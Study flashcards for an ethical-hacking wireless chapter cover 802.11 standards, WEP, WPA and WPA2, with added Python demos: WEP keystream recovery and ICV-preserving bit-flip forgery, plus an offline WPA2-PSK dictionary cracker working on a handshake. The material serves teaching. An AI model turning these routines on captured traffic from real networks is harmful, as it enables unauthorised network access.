Chapter 7 - Wireless Network Hacking Flashcards
List the speeds, frequencies and modulation type for the following
- 11a
- 11b
- 11g
- 11n
- 11ac
- 11a - 54 Mbps, 5 GHz, OFDM
- 11b - 11 Mbps, 2.4 GHz, DSSS
- 11g - 54 Mbps, 2.4 GHz, OFDM (falls back to DSSS to stay compatible with 11b clients)
- 11n - 100+ Mbps (up to 600 Mbps with 4x4 MIMO), 2.4 and 5 GHz, OFDM
- 11ac - 1000+ Mbps (gigabit), 5 GHz only, OFDM with up to 256-QAM subcarrier modulation
Exam Tip
- 11i
- 802.16
- 11i - the 802.11 amendment that defines WLAN security mechanisms (802.1X/EAP authentication, the 4-way handshake, TKIP and AES-CCMP); WPA2 is the Wi-Fi Alliance certification of it
- 802.16 - WiMAX, a wireless MAN standard rather than a WLAN one; speeds started at about 40 Mbps and later revisions target gigabit rates
Define Orthogonal Frequency Division Multiplexing (OFDM)
many narrowband subcarriers simultaneously carry pieces of the same message.
The channel is divided into a set of closely spaced subcarriers whose frequencies are chosen to be orthogonal: their spectra overlap, but they do not interfere with each other, so each can carry a separate signal and the receiver separates them with an FFT. Used by 11a/g/n/ac.
Define Direct Sequence Spread Spectrum (DSSS)
DSSS spreads one message across the whole channel at once: each data bit is multiplied by a faster pseudorandom "chipping" sequence (an 11-chip Barker code in 802.11b), so the entire bandwidth is used for the delivery of a single message. The receiver multiplies by the same sequence to despread, which averages out narrowband interference and lets the bit survive several corrupted chips.
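As an added example (not from the book) of what the chipping sequence buys, the block below spreads bits with the 802.11b Barker-11 code, corrupts individual chips as interference would, and shows that despreading by correlation still recovers the bits as long as fewer than half the chips of a symbol are flipped. The bit pattern and the corrupted chip positions are constructed for the demonstration.

```python
"""DSSS spread/despread with the 802.11b Barker-11 chipping sequence (added example)."""

# The 11-chip Barker code 802.11b uses to spread each 1 Mbps data bit to 11 Mchips/s.
BARKER_11 = (1, -1, 1, 1, -1, 1, 1, 1, -1, -1, -1)

def spread(bits):
    """Replace every bit with the Barker code (bit 1) or its inverse (bit 0)."""
    chips = []
    for b in bits:
        sign = 1 if b else -1
        chips.extend(sign * c for c in BARKER_11)
    return chips

def despread(chips):
    """Correlate each 11-chip block with the code: +11 for a clean 1, -11 for a clean 0.
    The sign of the correlation is the bit, so up to 5 flipped chips per block are tolerated."""
    n = len(BARKER_11)
    bits = []
    for i in range(0, len(chips), n):
        block = chips[i:i + n]
        corr = sum(x * c for x, c in zip(block, BARKER_11))
        bits.append(1 if corr > 0 else 0)
    return bits

def corrupt(chips, positions):
    """Simulate narrowband interference by inverting the chips at the given positions (constructed)."""
    out = list(chips)
    for p in positions:
        out[p] = -out[p]
    return out

if __name__ == "__main__":
    bits = [1, 0, 1, 1, 0]
    chips = spread(bits)                      # 5 bits -> 55 chips (processing gain ~10.4 dB)
    print(despread(corrupt(chips, [0, 3, 7, 12, 20, 30, 44, 50])))   # survives scattered errors
    print(despread(corrupt(chips, [0, 1, 2, 3, 4, 5])))              # 6 of 11 chips wrong: bit lost
```

The first corruption flips at most three chips in any one symbol and every bit comes back; the second flips six chips of the first symbol, which is more than half, and that bit inverts. This is the whole reason the book says DSSS "uses the entire bandwidth at once".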
Define Basic Service Area (BSA)
Define Basic Service Set (BSS)
BSA - single access point coverage
BSS - communication between single AP and its clients
Define Extended Service Set (ESS)
when multiple APs advertising the same SSID are set up on non-overlapping channels so that a client can disassociate from one and associate with the next as it roams between them.
Define BSSID
the MAC Address of the WAP at the center of your BSS
Define dipole and Parabolic dish antennas
dipole - two radiating elements (the book's two signal "towers"); omnidirectional, short range
parabolic dish - like a satellite dish; highly directional with tremendous range, which is why attackers use one to reach a network from well outside its intended coverage area
Define Service Set Identifier (SSID)
text string (up to 32 bytes) that identifies the wireless network; it is sent in the clear in beacons and probe responses, so hiding it is not a security control
Compare Association and Authentication for a WLAN
Association - act of a client connecting to an AP so the AP will forward its frames
Authentication - the client proves its identity before it can access anything on the network. In 802.11 the order is authentication first (Open System or the legacy Shared Key), then association; with WPA/WPA2 the real authentication (802.1X/EAP or PSK, finished by the 4-way handshake) happens after association, and only then is data traffic allowed
Wired Equivalent Privacy (WEP) encryption notes
Intended only to give privacy equivalent to an unencrypted wired network (the "wired equivalent" of the name)
Uses the RC4 stream cipher with a static 40- or 104-bit key and a 24-bit Initialization Vector (IV) that is sent in the clear
WEP IV issues
a 32-bit CRC-32 integrity check value (ICV) is computed over the payload and appended to it
the 24-bit IV is prepended to the static key, and that concatenation seeds RC4
the RC4 keystream is XORed with payload+ICV to produce the ciphertext; the IV is sent in the clear ahead of it
But the IV space is small (2^24, about 16.7 million values, and many cards start at 0 or count sequentially), so keystreams repeat on a busy network and two frames with the same IV can be XORed against each other; RC4's key scheduling leaks key bytes when the first bytes of the key are the known IV (FMS, KoreK, PTW attacks); and CRC-32 is linear, so ciphertext bits can be flipped and the ICV patched without the key. An attacker who captures enough packets (tens of thousands with PTW, usually accelerated by replaying captured ARP requests) recovers the key in minutes.
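The two structural failures above (keystream reuse from a repeated IV, and the linear CRC-32 "integrity" check) are easy to see in code. The block below is an added example, not code from the book: a toy WEP encryptor with a textbook RC4, a known-plaintext keystream recovery that decrypts a second frame sent under the same IV without the key, and a bit-flip that rewrites an encrypted frame so it still passes the ICV. The key, IV and payloads are constructed test values, and the key-ID byte of a real frame is omitted.

```python
"""Toy WEP encryption and two of its classic failures (added example, not from the book)."""
import struct
import zlib

def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 KSA + PRGA, returning `length` keystream bytes. WEP seeds it with IV || key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))

def icv(plaintext: bytes) -> bytes:
    """WEP's 'integrity' check: a plain CRC-32 of the payload, little-endian, keyed by nothing."""
    return struct.pack("<I", zlib.crc32(plaintext))

def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(wep_key) in (5, 13), "24-bit IV, 40- or 104-bit key"
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4_keystream(iv + wep_key, len(data)))

def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return (plaintext, icv_ok). The IV is read from the clear-text prefix of the frame."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + wep_key, len(body)))
    plaintext, received_icv = data[:-4], data[-4:]
    return plaintext, received_icv == icv(plaintext)

# Failure 1: IV reuse. Same IV + same static key = same keystream for every frame.
def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext for one frame (an ARP request, say) yields the keystream for its IV."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))

def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame that reused the IV, no key needed, up to the keystream length."""
    return xor(frame[3:], keystream)[:-4]

# Failure 2: CRC-32 is linear: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros of len P).
# So an attacker can flip payload bits through the ciphertext and patch the encrypted ICV.
def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Return a forged frame whose plaintext is the original XOR `delta` and whose ICV verifies."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n, "delta covers the payload, one byte per payload byte"
    icv_delta = struct.pack("<I", zlib.crc32(delta) ^ zlib.crc32(bytes(n)))
    return iv + xor(body[:n], delta) + xor(body[n:], icv_delta)

if __name__ == "__main__":
    key, iv = b"\x01\x02\x03\x04\x05", b"\x00\x00\x2a"        # constructed 40-bit key and IV
    frame_a = wep_encrypt(key, iv, b"GET / HTTP/1.0\r\n")
    frame_b = wep_encrypt(key, iv, b"hunter2")                  # same IV reused
    ks = recover_keystream(frame_a, b"GET / HTTP/1.0\r\n")
    print(decrypt_with_keystream(frame_b, ks))                  # plaintext of frame_b, no key used
    delta = bytearray(16); delta[4] = ord("/") ^ ord("x")
    print(wep_decrypt(key, flip_bits(frame_a, bytes(delta))))   # modified request, ICV still OK
```

Real attacks go one step further: with enough frames the relationship between the clear-text IV and the first keystream byte leaks the static key itself, which is what aircrack-ng's PTW mode does. The point of the toy is that neither the "privacy" nor the "integrity" survives even when the key stays secret.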
WiFi Protected Access (WPA)
Uses TKIP: a 128-bit temporal key is mixed per packet with the transmitter's MAC address and a 48-bit sequence counter, so every frame gets a fresh RC4 key, and a keyed Michael MIC replaces WEP's CRC
The temporal key is rotated regularly (the book cites every 10,000 packets), hence "Temporal"
Keys are never sent over the air. Both sides derive the PMK (from the preshared key, or from an EAP/802.1X session in enterprise mode), then a 4-way handshake exchanges nonces and MICs: it proves to the client that the AP holds the PMK and vice versa, and both derive the per-session PTK from it
TKIP
Temporal Key Integrity Protocol
A stopgap designed to run on existing WEP hardware, so it still uses RC4 underneath. It fixed WEP's IV reuse and key scheduling problems but has its own weaknesses (Beck-Tews and later attacks on the Michael MIC and QoS frames) and is deprecated; use AES-CCMP instead
WiFi Protected Access 2 (WPA2)
Uses AES (a FIPS 140-2 approved cipher) in place of RC4; this is the 802.11i mandatory mode
WPA2-Enterprise - authentication via 802.1X/EAP against a RADIUS server, so each user gets a unique PMK
WPA2-Personal - uses a preshared key (PSK) derived from the passphrase and SSID; every client shares it, and a captured 4-way handshake can be attacked offline with a wordlist
Uses CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol): AES in counter mode for confidentiality plus a CBC-MAC message integrity code (MIC) for integrity; the MIC is a keyed MAC, not a hash
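The PSK derivation and the 4-way handshake MIC described in the WPA and WPA2 cards are short enough to reproduce, and doing so shows exactly why a captured handshake is enough for an offline attack on WPA2-Personal. The block below is an added example, not code from the book: it derives the PMK with PBKDF2 (the 802.11i formula, checked against the standard's "password"/"IEEE" test vector), expands it to the PTK with the 802.11i PRF, computes the descriptor-version-2 (HMAC-SHA1-128) Key MIC over a constructed message 2, and then recovers the passphrase from a wordlist the way aircrack-ng or hashcat would. MAC addresses, nonces and the passphrase are constructed; the message 2 frame is built with an empty Key Data field rather than the RSN IE a real one carries.

```python
"""WPA2-PSK key derivation and 4-way handshake MIC check (added example, not from the book)."""
import hashlib
import hmac
import struct

PTK_LEN = 48      # CCMP PTK: KCK (16) || KEK (16) || TK (16)
MIC_OFFSET = 81   # byte offset of the 16-byte Key MIC inside an EAPOL-Key frame
MIC_LEN = 16

def derive_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)

def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]

def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Both sides compute this from the PMK plus the two MACs and two nonces seen in messages 1-2.
    Nothing secret crosses the air; only the nonces do."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, PTK_LEN)

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC
    field zeroed, truncated to 128 bits. (Version 1, TKIP, uses HMAC-MD5 instead.)"""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]

def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Constructed message 2 of the 4-way handshake (supplicant -> AP), with an empty Key Data."""
    body = (b"\x02"                              # descriptor type: RSN
            + b"\x01\x0a"                        # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x00"                        # key length (0 in message 2)
            + bytes(7) + b"\x01"                 # replay counter
            + snonce                             # key nonce = SNonce
            + bytes(16) + bytes(8) + bytes(8)    # key IV, key RSC, key ID (unused here)
            + bytes(MIC_LEN)                     # MIC placeholder, filled in below
            + b"\x00\x00")                       # key data length
    frame = b"\x02\x03" + struct.pack(">H", len(body)) + body   # 802.1X v2, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]

def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: the SSID, MACs, nonces and MIC are all in the capture,
    so every candidate passphrase can be tested without talking to the AP."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        ptk = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), target):   # KCK = first 16 bytes
            return candidate
    return None

if __name__ == "__main__":
    ssid = b"TestNet"                                    # constructed network
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    ptk = derive_ptk(derive_pmk(b"correct horse", ssid), aa, spa, anonce, snonce)
    msg2 = build_msg2(snonce, ptk[:16])                  # what a sniffer would capture
    print(crack_psk(ssid, aa, spa, anonce, snonce, msg2,
                    [b"password", b"letmein", b"correct horse", b"admin123"]))
```

The cost per guess is the 4096-iteration PBKDF2, which is why the passphrase length and entropy are the only defence in WPA2-Personal; enterprise mode sidesteps the problem by giving each user a PMK that never derives from a shared passphrase.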